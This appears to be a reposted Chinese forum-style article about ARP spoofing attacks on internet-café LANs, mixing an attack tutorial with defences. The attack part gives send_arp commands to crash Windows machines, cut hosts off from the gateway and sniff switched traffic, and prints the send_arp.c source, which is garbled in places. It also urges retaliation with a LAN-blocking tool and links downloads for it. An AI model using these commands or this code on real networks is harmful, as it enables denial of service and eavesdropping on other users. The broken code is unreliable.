|
導讀網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據... 網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 我一個朋友的網吧最近遭受一種奇怪的攻擊,他網吧一共有60臺機器,和另外6個網吧并在一個網段中,IP地址從192.168.0.1~192.168.0.255,大家共用CS服務器和WEB及流媒體服務器,其中一臺CS服務器和流媒體服務器在他網吧里。 最近每晚和中午,他網吧客滿的時候,就有人在網內對他網吧的IP段進行攻擊。表現是大面積IP地址沖突,造成機器暫時停止網絡響應,而且網絡中的CS服務器和流媒體服務器馬上停止響應。一般持續半小時以上,IP沖突的速度大約10秒一次。連續幾天都是如此,造成他很大損失。 我朋友求助于我,于是我先試驗了一下,證明故意修改IP的方式是無法造成服務器失去響應的,于是我在他網吧兩臺機器上安裝了一些監測軟件,試圖捕捉對方的攻擊數據包,然后再取得對方的MAC地址來查找攻擊來源。由于主要表現是IP沖突,所以我使用commview3專門捕捉所有的ARP協議包,結果在晚上對方攻擊時果然發現出現了大量有規律的ARP廣播包,那些包明顯是某種軟件生成的,MAC地址是隨機偽造的,IP地址就是他網吧的系列IP,這種包和一般開機的包不同,是pass-thourgh包,機器收到后98系統馬上失去網絡響應,只有等很長時間或者重起,2K系統也馬上失去響應,必須點確定才能恢復,但是所有連接的用戶都Time Out了。 由于包里MAC地址是偽造的,所以我無法查到來源,于是我去網上查找了一些資料,證明這是一種ARP拒絕服務攻擊,但是沒找到任何有效防范辦法,微軟也沒有相應的補丁。唯一的辦法除非在網絡中使用路由器屏蔽ARP,用硬件存儲ARP列表,但是路由器不是一個小網吧可以承擔的設備。當然如果劃分網段,再用網關把他和大家隔開也可以,因為ARP只在一個網段傳播,但是這樣別人就無法共用他們的服務器,而且破壞者也可以到他網吧來繼續破壞,這也是不行的。 我又試用了各種防火墻軟件,證明也無法攔住這樣的攻擊包,沒有一個防火墻產品可以屏蔽非法的ARP包。使用天網2.5和金山網鏢,甚至用斷開網絡選項都無法擋住攻擊。 我后來在網上找到了一個叫做“……”(為防止別有用心的人用來干壞事,我略去這個軟件的名字,轉貼者也就是本人注)的軟件,果然可以達到這個效果,證明這樣的攻擊軟件在網上是大量存在的,大家可以去google里搜索下載這個軟件。 我現在唯一能告訴他的辦法就是遇到攻擊就拔網線,各位高手,還有沒有什么低廉方便的手段能解決這個問題啊,我朋友都急死了,再這樣他的網吧就做不下去了。 請大家幫幫忙!!謝謝:) 分析: 網上關于ARP的資料已經很多了,就不用我都說了。 用某一位高手的話來說,“我們能做的事情很多,唯一受 限制的是我們的創造力和想象力”。 ARP也是如此。 以下討論的機子有 一個要攻擊的機子:10.5.4.178 硬件地址:52:54:4C:98:EE:2F 我的機子: :10.5.3.69 硬件地址:52:54:4C:98:ED:C5 網關: 10.5.0.3 硬件地址:00:90:26:3D:0C:F3 一臺交換機另一端口的機子:10.5.3.3 硬件地址:52:54:4C:98:ED:F7 一:用ARP破WINDOWS的屏保 原理:利用IP沖突的級別比屏保高,當有沖突時,就會 跳出屏保。 關鍵:ARP包的數量適當。 [root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \ 10.5.4.178 52:54:4C:98:EE:2F 40 二:用ARP導致IP沖突,死機 原理:WINDOWS 9X,NT4在處理IP沖突時,處理不過來,導致死機。 注: 對WINDOWS 2K,LINUX相當于flooding,只是比一般的FLOODING 有效的多.對LINUX,明顯系統被拖慢。 [root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \ 10.5.4.178 52:54:4C:98:EE:2F 999999999 三:用ARP欺騙網關,可導致局域網的某臺機子出不了網關。 原理:用ARP應答包去刷新對應著要使之出不去的機子。 [root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22 \ 10.5.4.178 00:90:26:3D:0C:F3 1 注意:如果單單如上的命令,大概只能有效幾秒鐘,網關機子里的ARP 高速緩存會被被攻擊的機子正確刷新,于是只要... 四:用ARP欺騙交換機,可監聽到交換機另一端的機子。 可能需要修改一下send_arp.c,構造如下的數據包。 ethhdr srchw:52:54:4C:98:ED:F7--->dsthw:FF:FF:FF:FF:FF:FF proto:806H arphdr hwtype:1 protol:800H hw_size:6 pro_size:4 op:1 s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3 d_ha:00:00:00:00:00:00 d_ip:10.5.3.3 然后就可以sniffer了。 原理: 交換機是具有記憶MAC地址功能的,它維護一張MAC地址和它的口號表 所以你可以先來個ARP 欺騙,然后就可以監聽了 不過需要指出,欺騙以后,同一個MAC地址就有兩個端口號 yuange說,“這樣其實就是一個競爭問題。” 好象ARP 以后,對整個網絡會有點影響,不過我不敢確定 既然是競爭,所以監聽也只能監聽一部分,不象同一HUB下的監聽。 對被監聽者會有影響,因為他掉了一部分數據。 當然還有其他一些應用,需要其他技術的配合。 以下是send_arp.c的源程序 /* This program sends out one ARP packet with source/target IP and Ethernet hardware addresses suuplied by the user. It compiles and works on Linux and will probably work on any Unix that has SOCK_PACKET. volobuev@t1.chem.umn.edu */ #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <stdio.h> #include <errno.h> #include <sys/ioctl.h> #include <net/if.h> #include <signal.h> #include <netinet/ip.h> #include <netinet/in.h> #include <string.h> #include <arpa/inet.h> #include <netinet/ip_icmp.h> #include <linux/if_ether.h> #define ETH_HW_ADDR_LEN 6 #define IP_ADDR_LEN 4 #define ARP_FRAME_TYPE 0x0806 #define ETHER_HW_TYPE 1 #define IP_PROTO_TYPE 0x0800 #define OP_ARP_REQUEST 2 #define OP_ARP_QUEST 1 #define DEFAULT_DEVICE "eth0" char usage[] = {"send_arp: sends out custom ARP packet. yuri volobuev usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number"}; struct arp_packet { u_char targ_hw_addr[ETH_HW_ADDR_LEN]; u_char src_hw_addr[ETH_HW_ADDR_LEN]; u_short frame_type; u_short hw_type; u_short prot_type; u_char hw_addr_size; u_char prot_addr_size; u_short op; u_char sndr_hw_addr[ETH_HW_ADDR_LEN]; u_char sndr_ip_addr[IP_ADDR_LEN]; u_char rcpt_hw_addr[ETH_HW_ADDR_LEN]; u_char rcpt_ip_addr[IP_ADDR_LEN]; u_char padding[18]; }; void die (char *); void get_ip_addr (struct in_addr *, char *); void get_hw_addr (char *, char *); int main (int argc, char * argv[]) { struct in_addr src_in_addr, targ_in_addr; struct arp_packet pkt; struct sockaddr sa; int sock; int j,number; if (argc != 6) die(usage); sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_RARP)); if (sock < 0) { perror("socket"); exit(1); } number=atoi(argv[5]); pkt.frame_type = htons(ARP_FRAME_TYPE); pkt.hw_type = htons(ETHER_HW_TYPE); pkt.prot_type = htons(IP_PROTO_TYPE); pkt.hw_addr_size = ETH_HW_ADDR_LEN; pkt.prot_addr_size = IP_ADDR_LEN; pkt.op = htons(OP_ARP_QUEST); get_hw_addr(pkt.targ_hw_addr, argv[4]); get_hw_addr(pkt.rcpt_hw_addr, argv[4]); get_hw_addr(pkt.src_hw_addr, argv[2]); get_hw_addr(pkt.sndr_hw_addr, argv[2]); get_ip_addr(&src_in_addr, argv[1] get_ip_addr(&targ_in_addr, argv[3] memcpy(pkt.sndr_ip_addr, &src_in_addr, IP_ADDR_LEN); memcpy(pkt.rcpt_ip_addr, &targ_in_addr, IP_ADDR_LEN); bzero(pkt.padding,18); strcpy(sa.sa_data,DEFAULT_DEVICE); for (j=0;j<number;j++) { if (sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0) { perror("sendto"); exit(1); } } exit(0); } void die (char *str) { fprintf(stderr,"%s\n",str); exit(1); } void get_ip_addr (struct in_addr *in_addr, char *str) { struct hostent *hostp; in_addr->s_addr = inet_addr(str); if(in_addr->s_addr == -1) { if ((hostp = gethostbyname(str))) bcopy(hostp->h_addr, in_addr, hostp->h_length); else { fprintf(stderr, "send_arp: unknown host %s\n", str); exit(1); } } } void get_hw_addr (char *buf, char *str) { int i; char c, val; for(i = 0; i < ETH_HW_ADDR_LEN; i++) { if (!(c = tolower(*str++))) die("Invalid hardware address"); if (isdigit©) val = c - '0'; else if (c >= 'a' && c <= 'f') val = c-'a'+10; else die("Invalid hardware address"); *buf = val << 4; if (!(c = tolower(*str++))) die("Invalid hardware address"); if (isdigit©) val = c - '0'; else if (c >= 'a' && c <= 'f') val = c-'a'+10; else die("Invalid hardware address"); *buf++ |= val; if (*str == ':') str++; } } 以下是我用軟件攔下的局域網終結者的記錄﹐看來這個軟件只是根據你在攻擊軟件里面輸入的IP列表的IP及MAC地址﹐然后產生一個假的MAC地址去﹐使正在使用的網絡發生異常﹐我也試著解決這個問題﹐但目前除了靜態ARP之外﹐沒有其他更好的辦法了﹐這是采用TCP/IP協議的必然了。 但是作為網管﹐完全可以追蹤到搞破壞的人的電腦呀﹐然后把此人打成馬蜂窩﹐并送公安局﹐這種只會利用別人現在工具搞破壞的人最可誤了﹗有能力自己寫吧﹗ 下面作參考﹐但不要攻擊我呀﹐如果有錯誤﹐請大家指正﹐謝謝了﹗ 1581 89.348477 LOCAL REALTEEE1819 SMB R tree disconnect FANLI 7733797.00E04CEE1819 IPX/XNS Frame: Base frame properties Frame: Time of capture = 2002/10/23 13:48:21.616 Frame: Time delta from previous physical frame: 0 microseconds Frame: Frame number: 1581 Frame: Total frame length: 100 bytes Frame: Capture frame length: 100 bytes Frame: Frame data: Number of data bytes remaining = 100 (0x0064) ETHERNET: 802.3 Length = 100 ETHERNET: Destination address : 00E04CEE1819 ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : 00E04CF8B16B ETHERNET: .......0 = No routing information present ETHERNET: ......0. = Universally administered address ETHERNET: Frame Length : 100 (0x0064) ETHERNET: Data Length : 0x0056 (86) ETHERNET: Ethernet Data: Number of data bytes remaining = 86 (0x0056) LLC: UI DSAP=0xE0 SSAP=0xE0 C LLC: DSAP = 0xE0 : INDIVIDUAL : Novell IPX/SPX LLC: SSAP = 0xE0: COMMAND : Novell IPX/SPX LLC: Frame Category: Unnumbered Frame LLC: Command = UI LLC: LLC Data: Number of data bytes remaining = 83 (0x0053) IPX: NetBIOS Packet - 7733797.00E04CF8B16B.455 -> 7733797.00E04CEE1819.455 - 0 Hops IPX: Checksum = 65535 (0xFFFF) IPX: IDP Length = 83 (0x53) IPX: Transport control = 0 (0x0) IPX: Packet type = IPX IPX: Destination Address Summary 7733797.00E04CEE1819.455 IPX: Destination IPX Address = 07733797.00E04CEE1819 IPX: Destination Net Number = 124991383 (0x7733797) IPX: Destination Socket Number = NetBIOS IPX: Source Address Summary 7733797.00E04CF8B16B.455 IPX: Source IPX Address = 07733797.00E04CF8B16B IPX: Source Net Number = 124991383 (0x7733797) IPX: Source Socket Number = NetBIOS IPX: Data: Number of data bytes remaining = 53 (0x0035) NBIPX: Session Data NBIPX: Connection control flag NBIPX: 0....... = Non system packet NBIPX: .0...... = No send acknowledge NBIPX: ..0..... = No Attention NBIPX: ...1.... = End Of Message NBIPX: ....0... = No resend NBIPX: Data stream type = Session Data NBIPX: Source connection ID = 10227 (0x27F3) NBIPX: Destination connection ID = 3 (0x3) NBIPX: Send sequence number = 119 (0x77) NBIPX: Total data length = 35 (0x23) NBIPX: Offset = 0 (0x0) NBIPX: Data length = 35 (0x23) NBIPX: Receive Sequence number = 122 (0x7A) NBIPX: Bytes received = 127 (0x7F) NBIPX: Data: Number of data bytes remaining = 35 (0x0023) SMB: R tree disconnect SMB: NT status code = 0x0, Facility = System, Severity = Success, Code = (0) STATUS_WAIT_0 SMB: NT Status Severity Code = Success SMB: NT Status Customer Code = 0 (0x0) SMB: NT Status Reserved Bit = 0 (0x0) SMB: NT Status Facility = System SMB: NT Status Code System Success = STATUS_WAIT_0 SMB: Header: PID = 0xFEFF TID = 0x0803 MID = 0x5E84 UID = 0x6801 SMB: Tree ID (TID) = 2051 (0x803) SMB: Process ID (PID) = 65279 (0xFEFF) SMB: User ID (UID) = 26625 (0x6801) SMB: Multiplex ID (MID) = 24196 (0x5E84) SMB: Flags Summary = 152 (0x98) SMB: .......0 = Lock & Read and Write & Unlock not supported SMB: ......0. = Send No Ack not supported SMB: ....1... = Using caseless pathnames SMB: ...1.... = Canonicalized pathnames SMB: ..0..... = No Opportunistic lock SMB: .0...... = No Change Notify SMB: 1....... = Server response SMB: flags2 Summary = 51207 (0xC807) SMB: ...............1 = Understands long filenames SMB: ..............1. = Understands extended attributes SMB: ...0............ = No DFS namespace SMB: ..0............. = No paging of IO SMB: .1.............. = Using NT status codes SMB: 1............... = Using UNICODE strings SMB: Unknown Flag2 bits = 2052 (0x804) SMB: Command = C tree disconnect SMB: Word count = 0 SMB: Byte count = 0 00000: 00 E0 4C EE 18 19 00 E0 4C F8 B1 6B 00 56 E0 E0 .àLî...àLø±k.Vàà 00010: 03 FF FF 00 53 00 04 07 73 37 97 00 E0 4C EE 18 .ÿÿ.S...s7—.àLî. 00020: 19 04 55 07 73 37 97 00 E0 4C F8 B1 6B 04 55 10 ..U.s7—.àLø±k.U. 00030: 06 F3 27 03 00 77 00 23 00 00 00 23 00 7A 00 7F .ó'..w.#...#.z. 00040: 00 FF 53 4D 42 71 00 00 00 00 98 07 C8 00 00 00 .ÿSMBq....˜;.È... 00050: 00 00 00 00 00 00 00 00 00 03 08 FF FE 01 68 84 ...........ÿþ.h„; 00060: 5E 00 00 00 ^... 解決方法: 方法一: 網段A(192.168.0.x) 通過------> 網關服務器(192.168.0.1;192.168.10.1) -----〉 和網段B(192.168.10.x)通信。 假設架設 CS服務器在 網段B 192.168.10.88 機器上, 現在 在 網關服務器上架著一個端口轉發程序(有很多的自己找) 比如定義 網關服務器的27015端口 轉發 指定 192.168.0.10.88 的27015端口 現在在網段A(192.168.0.x) 的玩家只要的 互聯網游戲地址處加入 192.168.0.1:27015 就可以找到 192.168.10.88 的CS服務器了 個人認為比較好的 辦法是 把網段分開 , 在網關服務器上做端口轉發服務 來達到 共享CS服務器等 功能,就可以解決了~ 方法二: 捆綁MAC和IP地址 杜絕IP地址盜用現象 到代理服務器端讓網絡管理員把您上網的靜態IP地址與所記錄計算機的網卡地址進行捆綁。具體命令是: ARP -s 192.168.0.4 00-EO-4C-6C-08-75 這樣,就將您上網的靜態IP地址192.168.0.4與網卡地址為00-EO-4C-6C-08-75的計算機綁定在一起了,即使別人盜用您的IP地址192.168.0.4也無法通過代理服務器上網。其中應注意的是此項命令僅在局域網中上網的代理服務器端有用,還要是靜態IP地址,像一般的Modem撥號上網是動態IP地址就不起作用。接下來我們對各參數的功能作一些簡單的介紹: ARP-s-d-a -s——將相應的IP地址與物理地址的捆綁。 -d——刪除所給出的IP地址與物理地址的捆綁。 -a——通過查詢Arp協議表來顯示IP地址和對應物理地址情況。 方法三: 網絡執法官這個軟件相信大家都聽說過了。功能不錯,可以禁止局域網任意機器連接網絡。這個功能對網管來說的確不錯。不過如果這個軟件落到那些卑鄙小人的手里---那后果就不堪設想了。輕則把你封了上不了網,重則可以導致整個局域網癱瘓。。 廢話不說了,切入正題吧。現在教大家兩招輕松防范網絡執法官!! NO.1 首先呢,最穩妥的一個辦法就是修改機器的MAC地址,只要把MAC地址改為別的,就可以欺騙過網絡執法官,從而達到突破封鎖的目的。下面是修改MAC地址的方法: linux環境下: 需要用 #ifconfig eth0 down 先把網卡禁用 再用ifconfig eth0 hw ether 1234567890ab 這樣就可以改成功了 要想永久改就這樣 在/etc/rc.d/rc.local里加上這三句(也可以在/etc/init.d/network里加下面三行) ifconfig eth0 down ifconfig eth0 hw ether 1234567890ab ifconfig eth0 up 另: 在win2000中改MAC地址的方法: 打開注冊表編輯器,找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\子鍵,在該子鍵下的0000,0001,0002等分支中查找DriverDesc,在0000子鍵下天一個字符串項,命名為NetworkAddress,鍵值設為修改后的MAC地址,要求為連續的12個16進制數,如1234567890AB(注意位數要對!不能是000000000000,不能與別的機器重復)。然后在0000下的NDI\params中加一項名為NetworkAddress的子鍵,在該子鍵下添加名為defau lt的字符串,鍵值為修改后的MAC地址,與上面的數值相同。在NetworkAddress的主鍵下繼續添加命名為ParamDesc的字符串,其作用是制定NetworkAddress主鍵的描述,其值可為“MAC 地址”,這樣以后打開網絡屬性,雙擊相應的網卡會發現有一個高級設置,其下坐在“MAC地址”的選項,在此修改MAC地址就可以了,修改后需重啟。 Windows環境: 用dos,8139的可以改,用realtek的pg8139.exe,比如 是8139c網卡,就改寫8139c.cfg文件,第一行就是網卡mac,想怎么改就怎么改 NO.2 另外一種方法,我沒有試,一種設想,有條件的朋友幫忙試一下。 由于網絡執法官的原理是通過ARP欺騙發給被攻擊的電腦一個假的網關IP地址對應的MAC,使其找不到網關真正的MAC,那么我們可以自己修改IP->MAC的映射,使網絡執法官ARP欺騙失效。具體做法如下: 在還沒有被封鎖的時候進入CMD執行如下命令 e:\>ping 192.168.9.1 (假設此地址位網關。) Pinging 192.168.9.1 with 32 bytes of data: Reply from 192.168.9.1: bytes=32 time<10ms TTL=64 Reply from 192.168.9.1: bytes=32 time<10ms TTL=64 Reply from 192.168.9.1: bytes=32 time<10ms TTL=64 Reply from 192.168.9.1: bytes=32 time<10ms TTL=64 Ping statistics for 192.168.9.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms e:\>arp -a Interface: 192.168.9.1 on Interface 0x5000003 Internet Address Physical Address Type 192.168.9.1 00-0E-70-32-f1-02 dynamic (上面的就是網關的MAC) 然后作這樣一個批處理文件保存起來。。注意!!!地址要換為你自己的網關的IP和MAC arp -s 192.168.9.1 00-0E-70-32-f1-02 然后呢,在你被封鎖的時候,就執行這個批處理吧。 NO.3 如果解除了網絡執法官的封鎖可不可以查到使用網絡執法官的人究竟是誰呢?答案是可以!(感謝zva提供方法)利用arpkiller的sniffer殺手掃描整個局域網IP段查找處在“混雜”(監聽)模式下的計算機,應該就是他了!!!(注意,掃描的時候自己也處在混雜模式,自己不能算哦) 之后做什么呢?就不用我說了吧?哈哈,以毒攻毒,用網絡執法官把她封了! 附: 用到的工具在此下載: 網絡執法官1.02注冊版 http://soft.piaoye.com/downtrojan/lanlawman1.02.zip arpkiller: http://www.chinesehack.org/soft/sni...RPKiller1.3.zip 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!
本站發布的Win7純凈版系統、Win10純凈版和XP純凈版系統僅為個人學習測試使用,請在下載后24小時內刪除,不得用于任何商業用途,否則后果自負,請支持購買微軟正版軟件!
本站所有資源全部來自于網絡資源,如侵犯到您的權益,請及時通知我們(peng896066052@126.com),我們會及時處理.
Copyright © 2018-2020 雨林木風下載站
